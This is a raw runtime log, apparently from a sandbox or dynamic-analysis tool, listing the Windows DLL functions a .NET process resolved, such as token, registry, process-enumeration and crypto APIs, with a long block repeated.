DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/AddVectoredContinueHandler
DynamicLoader: kernel32.dll/RemoveVectoredContinueHandler
DynamicLoader: ADVAPI32.dll/ConvertSidToStringSidW
DynamicLoader: shell32.dll/SHGetFolderPathW
DynamicLoader: kernel32.dll/FlushProcessWriteBuffers
DynamicLoader: kernel32.dll/GetWriteWatch
DynamicLoader: kernel32.dll/ResetWriteWatch
DynamicLoader: kernel32.dll/CreateMemoryResourceNotification
DynamicLoader: kernel32.dll/QueryMemoryResourceNotification
DynamicLoader: kernel32.dll/GlobalMemoryStatusEx
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CoGetContextToken
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetUserDefaultUILanguage
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetVersionEx
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/GetVersionEx
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/GetFullPathName
DynamicLoader: kernel32.dll/GetFullPathNameW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetFileAttributesEx
DynamicLoader: kernel32.dll/GetFileAttributesExW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: version.dll/GetFileVersionInfoSize
DynamicLoader: version.dll/GetFileVersionInfoSizeW
DynamicLoader: version.dll/GetFileVersionInfo
DynamicLoader: version.dll/GetFileVersionInfoW
DynamicLoader: version.dll/VerQueryValue
DynamicLoader: version.dll/VerQueryValueW
DynamicLoader: kernel32.dll/lstrlen
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: mscoree.dll/ND_RI2
DynamicLoader: mscoreei.dll/ND_RI2_RetAddr
DynamicLoader: mscoreei.dll/ND_RI2
DynamicLoader: kernel32.dll/lstrlen
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/lstrcpy
DynamicLoader: kernel32.dll/lstrcpyW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: version.dll/VerLanguageName
DynamicLoader: version.dll/VerLanguageNameW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetCurrentProcessIdW
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValue
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValueW
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivileges
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivilegesW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/OpenProcessW
DynamicLoader: PSAPI.DLL/EnumProcessModules
DynamicLoader: PSAPI.DLL/EnumProcessModulesW
DynamicLoader: PSAPI.DLL/GetModuleInformation
DynamicLoader: PSAPI.DLL/GetModuleInformationW
DynamicLoader: PSAPI.DLL/GetModuleBaseName
DynamicLoader: PSAPI.DLL/GetModuleBaseNameW
DynamicLoader: PSAPI.DLL/GetModuleFileNameEx
DynamicLoader: PSAPI.DLL/GetModuleFileNameExW
DynamicLoader: kernel32.dll/GetExitCodeProcess
DynamicLoader: kernel32.dll/GetExitCodeProcessW
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/NtQuerySystemInformationW
DynamicLoader: USER32.dll/EnumWindows
DynamicLoader: USER32.dll/EnumWindowsW
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: USER32.dll/GetWindowThreadProcessIdW
DynamicLoader: kernel32.dll/WerSetFlags
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguagesW
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguagesW
DynamicLoader: kernel32.dll/GetUserDefaultLocaleName
DynamicLoader: kernel32.dll/GetUserDefaultLocaleNameW
DynamicLoader: kernel32.dll/GetEnvironmentVariable
DynamicLoader: kernel32.dll/GetEnvironmentVariableW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyEx
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/CryptAcquireContextA
DynamicLoader: ADVAPI32.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/CryptCreateHash
DynamicLoader: ADVAPI32.dll/CryptDestroyHash
DynamicLoader: ADVAPI32.dll/CryptHashData
DynamicLoader: ADVAPI32.dll/CryptGetHashParam
DynamicLoader: ADVAPI32.dll/CryptImportKey
DynamicLoader: ADVAPI32.dll/CryptExportKey
DynamicLoader: ADVAPI32.dll/CryptGenKey
DynamicLoader: ADVAPI32.dll/CryptGetKeyParam
DynamicLoader: ADVAPI32.dll/CryptDestroyKey
DynamicLoader: ADVAPI32.dll/CryptVerifySignatureA
DynamicLoader: ADVAPI32.dll/CryptSignHashA
DynamicLoader: ADVAPI32.dll/CryptGetProvParam
DynamicLoader: ADVAPI32.dll/CryptGetUserKey
DynamicLoader: ADVAPI32.dll/CryptEnumProvidersA
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: CRYPTSP.dll/CryptGetHashParam
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: mscoreei.dll/_CorDllMain_RetAddr
DynamicLoader: mscoreei.dll/_CorDllMain
DynamicLoader: mscoree.dll/GetTokenForVTableEntry
DynamicLoader: mscoree.dll/SetTargetForVTableEntry
DynamicLoader: mscoree.dll/GetTargetForVTableEntry
DynamicLoader: mscoreei.dll/LoadLibraryShim_RetAddr
DynamicLoader: mscoreei.dll/LoadLibraryShim
DynamicLoader: culture.dll/ConvertLangIdToCultureName
DynamicLoader: ole32.dll/CoCreateGuid
DynamicLoader: kernel32.dll/CreateFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfo
DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfoW
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: kernel32.dll/GetCurrentProcessW
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/GetTokenInformationW
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: kernel32.dll/LocalAllocW
DynamicLoader: mscoree.dll/ND_RI4
DynamicLoader: mscoreei.dll/ND_RI4_RetAddr
DynamicLoader: mscoreei.dll/ND_RI4
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx
DynamicLoader: ADVAPI32.dll/DuplicateTokenExW
DynamicLoader: ADVAPI32.dll/CheckTokenMembership
DynamicLoader: ADVAPI32.dll/CheckTokenMembershipW
DynamicLoader: kernel32.dll/GetConsoleTitle
DynamicLoader: kernel32.dll/GetConsoleTitleW
DynamicLoader: mscorjit.dll/getJit
DynamicLoader: mscorwks.dll/GetCLRFunction
DynamicLoader: kernel32.dll/SetConsoleTitle
DynamicLoader: kernel32.dll/SetConsoleTitleW
DynamicLoader: kernel32.dll/SetConsoleCtrlHandler
DynamicLoader: kernel32.dll/SetConsoleCtrlHandlerW
DynamicLoader: kernel32.dll/CreateEvent
DynamicLoader: kernel32.dll/CreateEventW
DynamicLoader: ntdll.dll/WinSqmIsOptedIn
DynamicLoader: kernel32.dll/ExpandEnvironmentStrings
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: shfolder.dll/SHGetFolderPath
DynamicLoader: shfolder.dll/SHGetFolderPathW
DynamicLoader: kernel32.dll/SetEnvironmentVariable
DynamicLoader: kernel32.dll/SetEnvironmentVariableW
DynamicLoader: kernel32.dll/GetACP
DynamicLoader: kernel32.dll/UnmapViewOfFile
DynamicLoader: kernel32.dll/CreateFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetFileType
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/GetSystemInfo
DynamicLoader: kernel32.dll/VirtualQuery
DynamicLoader: ADVAPI32.dll/RegQueryInfoKey
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumValue
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegEnumKeyEx
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: secur32.dll/GetUserNameEx
DynamicLoader: secur32.dll/GetUserNameExW
DynamicLoader: ADVAPI32.dll/GetUserName
DynamicLoader: ADVAPI32.dll/GetUserNameW
DynamicLoader: kernel32.dll/ReleaseMutex
DynamicLoader: ADVAPI32.dll/RegisterEventSource
DynamicLoader: ADVAPI32.dll/RegisterEventSourceW
DynamicLoader: ADVAPI32.dll/DeregisterEventSource
DynamicLoader: ADVAPI32.dll/ReportEvent
DynamicLoader: ADVAPI32.dll/ReportEventW
DynamicLoader: kernel32.dll/GetLogicalDrives
DynamicLoader: kernel32.dll/GetDriveType
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/GetVolumeInformation
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: kernel32.dll/GetCurrentDirectory
DynamicLoader: kernel32.dll/GetCurrentDirectoryW
DynamicLoader: mscoreei.dll/GetTokenForVTableEntry_RetAddr
DynamicLoader: mscoreei.dll/GetTokenForVTableEntry
DynamicLoader: mscoreei.dll/SetTargetForVTableEntry_RetAddr
DynamicLoader: mscoreei.dll/SetTargetForVTableEntry
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: mscoree.dll/IEE
DynamicLoader: kernel32.dll/GetStdHandle
DynamicLoader: kernel32.dll/GetStdHandleW
DynamicLoader: kernel32.dll/GetConsoleMode
DynamicLoader: kernel32.dll/GetConsoleModeW
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/SetThreadUILanguageW
DynamicLoader: kernel32.dll/FindFirstFile
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: CRYPTSP.dll/CryptExportKey
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: mscoree.dll/CorExitProcess
DynamicLoader: mscoreei.dll/CorExitProcess_RetAddr
DynamicLoader: mscoreei.dll/CorExitProcess
DynamicLoader: mscorwks.dll/CorExitProcess
DynamicLoader: mscorwks.dll/_CorDllMain
DynamicLoader: kernel32.dll/CreateActCtxW
DynamicLoader: kernel32.dll/AddRefActCtx
DynamicLoader: kernel32.dll/ReleaseActCtx
DynamicLoader: kernel32.dll/ActivateActCtx
DynamicLoader: kernel32.dll/DeactivateActCtx
DynamicLoader: kernel32.dll/GetCurrentActCtx
DynamicLoader: kernel32.dll/QueryActCtxW
DynamicLoader: netutils.dll/NetApiBufferFree
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/CopyFileExW
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: kernel32.dll/SetConsoleInputExeNameW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: mscoreei.dll/GetStartupFlags
DynamicLoader: mscoree.dll/GetHostConfigurationFile
DynamicLoader: mscoreei.dll/GetHostConfigurationFile_RetAddr
DynamicLoader: mscoreei.dll/GetHostConfigurationFile
DynamicLoader: mscoreei.dll/GetCORVersion_RetAddr
DynamicLoader: mscoreei.dll/GetCORVersion
DynamicLoader: mscoree.dll/GetCORSystemDirectory
DynamicLoader: mscoreei.dll/GetCORSystemDirectory_RetAddr
DynamicLoader: mscoreei.dll/CreateConfigStream_RetAddr
DynamicLoader: mscoreei.dll/CreateConfigStream
DynamicLoader: ntdll.dll/RtlVirtualUnwind
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: kernel32.dll/SetThreadStackGuarantee
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/AddVectoredContinueHandler
DynamicLoader: kernel32.dll/RemoveVectoredContinueHandler
DynamicLoader: ADVAPI32.dll/ConvertSidToStringSidW
DynamicLoader: shell32.dll/SHGetFolderPathW
DynamicLoader: kernel32.dll/FlushProcessWriteBuffers
DynamicLoader: kernel32.dll/GetWriteWatch
DynamicLoader: kernel32.dll/ResetWriteWatch
DynamicLoader: kernel32.dll/CreateMemoryResourceNotification
DynamicLoader: kernel32.dll/QueryMemoryResourceNotification
DynamicLoader: kernel32.dll/GlobalMemoryStatusEx
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CoGetContextToken
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetUserDefaultUILanguage
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetVersionEx
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/GetVersionEx
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/GetFullPathName
DynamicLoader: kernel32.dll/GetFullPathNameW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetFileAttributesEx
DynamicLoader: kernel32.dll/GetFileAttributesExW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: version.dll/GetFileVersionInfoSize
DynamicLoader: version.dll/GetFileVersionInfoSizeW
DynamicLoader: version.dll/GetFileVersionInfo
DynamicLoader: version.dll/GetFileVersionInfoW
DynamicLoader: version.dll/VerQueryValue
DynamicLoader: version.dll/VerQueryValueW
DynamicLoader: kernel32.dll/lstrlen
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: mscoree.dll/ND_RI2
DynamicLoader: mscoreei.dll/ND_RI2_RetAddr
DynamicLoader: mscoreei.dll/ND_RI2
DynamicLoader: kernel32.dll/lstrlen
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/lstrcpy
DynamicLoader: kernel32.dll/lstrcpyW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: version.dll/VerLanguageName
DynamicLoader: version.dll/VerLanguageNameW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetCurrentProcessIdW
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValue
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValueW
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivileges
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivilegesW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/OpenProcessW
DynamicLoader: PSAPI.DLL/EnumProcessModules
DynamicLoader: PSAPI.DLL/EnumProcessModulesW
DynamicLoader: PSAPI.DLL/GetModuleInformation
DynamicLoader: PSAPI.DLL/GetModuleInformationW
DynamicLoader: PSAPI.DLL/GetModuleBaseName
DynamicLoader: PSAPI.DLL/GetModuleBaseNameW
DynamicLoader: PSAPI.DLL/GetModuleFileNameEx
DynamicLoader: PSAPI.DLL/GetModuleFileNameExW
DynamicLoader: kernel32.dll/GetExitCodeProcess
DynamicLoader: kernel32.dll/GetExitCodeProcessW
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/NtQuerySystemInformationW
DynamicLoader: USER32.dll/EnumWindows
DynamicLoader: USER32.dll/EnumWindowsW
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: USER32.dll/GetWindowThreadProcessIdW
DynamicLoader: kernel32.dll/WerSetFlags
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguagesW
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguagesW
DynamicLoader: kernel32.dll/GetUserDefaultLocaleName
DynamicLoader: kernel32.dll/GetUserDefaultLocaleNameW
DynamicLoader: kernel32.dll/GetEnvironmentVariable
DynamicLoader: kernel32.dll/GetEnvironmentVariableW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyEx
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/CryptAcquireContextA
DynamicLoader: ADVAPI32.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/CryptCreateHash
DynamicLoader: ADVAPI32.dll/CryptDestroyHash
DynamicLoader: ADVAPI32.dll/CryptHashData
DynamicLoader: ADVAPI32.dll/CryptGetHashParam
DynamicLoader: ADVAPI32.dll/CryptImportKey
DynamicLoader: ADVAPI32.dll/CryptExportKey
DynamicLoader: ADVAPI32.dll/CryptGenKey
DynamicLoader: ADVAPI32.dll/CryptGetKeyParam
DynamicLoader: ADVAPI32.dll/CryptDestroyKey
DynamicLoader: ADVAPI32.dll/CryptVerifySignatureA
DynamicLoader: ADVAPI32.dll/CryptSignHashA
DynamicLoader: ADVAPI32.dll/CryptGetProvParam
DynamicLoader: ADVAPI32.dll/CryptGetUserKey
DynamicLoader: ADVAPI32.dll/CryptEnumProvidersA
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: CRYPTSP.dll/CryptGetHashParam
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: mscoreei.dll/_CorDllMain_RetAddr
DynamicLoader: mscoreei.dll/_CorDllMain
DynamicLoader: mscoree.dll/GetTokenForVTableEntry
DynamicLoader: mscoree.dll/SetTargetForVTableEntry
DynamicLoader: mscoree.dll/GetTargetForVTableEntry
DynamicLoader: mscoreei.dll/LoadLibraryShim_RetAddr
DynamicLoader: mscoreei.dll/LoadLibraryShim
DynamicLoader: culture.dll/ConvertLangIdToCultureName
DynamicLoader: ole32.dll/CoCreateGuid
DynamicLoader: kernel32.dll/CreateFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfo
DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfoW
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: kernel32.dll/GetCurrentProcessW
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/GetTokenInformationW
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: kernel32.dll/LocalAllocW
DynamicLoader: mscoree.dll/ND_RI4
DynamicLoader: mscoreei.dll/ND_RI4_RetAddr
DynamicLoader: mscoreei.dll/ND_RI4
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx
DynamicLoader: ADVAPI32.dll/DuplicateTokenExW
DynamicLoader: ADVAPI32.dll/CheckTokenMembership
DynamicLoader: ADVAPI32.dll/CheckTokenMembershipW
DynamicLoader: kernel32.dll/GetConsoleTitle
DynamicLoader: kernel32.dll/GetConsoleTitleW
DynamicLoader: mscorjit.dll/getJit
DynamicLoader: mscorwks.dll/GetCLRFunction
DynamicLoader: kernel32.dll/SetConsoleTitle
DynamicLoader: kernel32.dll/SetConsoleTitleW
DynamicLoader: kernel32.dll/SetConsoleCtrlHandler
DynamicLoader: kernel32.dll/SetConsoleCtrlHandlerW
DynamicLoader: kernel32.dll/CreateEvent
DynamicLoader: kernel32.dll/CreateEventW
DynamicLoader: ntdll.dll/WinSqmIsOptedIn
DynamicLoader: kernel32.dll/ExpandEnvironmentStrings
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: shfolder.dll/SHGetFolderPath
DynamicLoader: shfolder.dll/SHGetFolderPathW
DynamicLoader: kernel32.dll/SetEnvironmentVariable
DynamicLoader: kernel32.dll/SetEnvironmentVariableW
DynamicLoader: kernel32.dll/GetACP
DynamicLoader: kernel32.dll/UnmapViewOfFile
DynamicLoader: kernel32.dll/CreateFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetFileType
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/GetSystemInfo
DynamicLoader: kernel32.dll/VirtualQuery
DynamicLoader: ADVAPI32.dll/RegQueryInfoKey
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumValue
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegEnumKeyEx
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: secur32.dll/GetUserNameEx
DynamicLoader: secur32.dll/GetUserNameExW
DynamicLoader: ADVAPI32.dll/GetUserName
DynamicLoader: ADVAPI32.dll/GetUserNameW
DynamicLoader: kernel32.dll/ReleaseMutex
DynamicLoader: ADVAPI32.dll/RegisterEventSource
DynamicLoader: ADVAPI32.dll/RegisterEventSourceW
DynamicLoader: ADVAPI32.dll/DeregisterEventSource
DynamicLoader: ADVAPI32.dll/ReportEvent
DynamicLoader: ADVAPI32.dll/ReportEventW
DynamicLoader: kernel32.dll/GetLogicalDrives
DynamicLoader: kernel32.dll/GetDriveType
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/GetVolumeInformation
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: kernel32.dll/GetCurrentDirectory
DynamicLoader: kernel32.dll/GetCurrentDirectoryW
DynamicLoader: mscoreei.dll/GetTokenForVTableEntry_RetAddr
DynamicLoader: mscoreei.dll/GetTokenForVTableEntry
DynamicLoader: mscoreei.dll/SetTargetForVTableEntry_RetAddr
DynamicLoader: mscoreei.dll/SetTargetForVTableEntry
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: mscoree.dll/IEE
DynamicLoader: kernel32.dll/GetStdHandle
DynamicLoader: kernel32.dll/GetStdHandleW
DynamicLoader: kernel32.dll/GetConsoleMode
DynamicLoader: kernel32.dll/GetConsoleModeW
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/SetThreadUILanguageW
DynamicLoader: kernel32.dll/FindFirstFile
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: CRYPTSP.dll/CryptExportKey
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: mscoree.dll/CorExitProcess
DynamicLoader: mscoreei.dll/CorExitProcess_RetAddr
DynamicLoader: mscoreei.dll/CorExitProcess
DynamicLoader: mscorwks.dll/CorExitProcess
DynamicLoader: mscorwks.dll/_CorDllMain
DynamicLoader: kernel32.dll/CreateActCtxW
DynamicLoader: kernel32.dll/AddRefActCtx
DynamicLoader: kernel32.dll/ReleaseActCtx
DynamicLoader: kernel32.dll/ActivateActCtx
DynamicLoader: kernel32.dll/DeactivateActCtx
DynamicLoader: kernel32.dll/GetCurrentActCtx
DynamicLoader: kernel32.dll/QueryActCtxW
DynamicLoader: netutils.dll/NetApiBufferFree
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/CopyFileExW
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: kernel32.dll/SetConsoleInputExeNameW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: shell32.dll/
DynamicLoader: ole32.dll/CoGetApartmentType
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl
DynamicLoader: ADVAPI32.dll/IsTextUnicode
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: shell32.dll/
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ntdll.dll/RtlDllShutdownInProgress
DynamicLoader: propsys.dll/PSCreateMemoryPropertyStore
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: profapi.dll/
DynamicLoader: LINKINFO.dll/CreateLinkInfoW
DynamicLoader: USER32.dll/IsCharAlphaW
DynamicLoader: USER32.dll/CharPrevW
DynamicLoader: ntshrui.dll/GetNetResourceFromLocalPathW
DynamicLoader: srvcli.dll/NetShareEnum
DynamicLoader: cscapi.dll/CscNetApiGetInterface
DynamicLoader: slc.dll/SLGetWindowsInformationDWORD
DynamicLoader: SHLWAPI.dll/PathRemoveFileSpecW
DynamicLoader: LINKINFO.dll/DestroyLinkInfo
DynamicLoader: propsys.dll/PropVariantToBoolean
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: mscoree.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
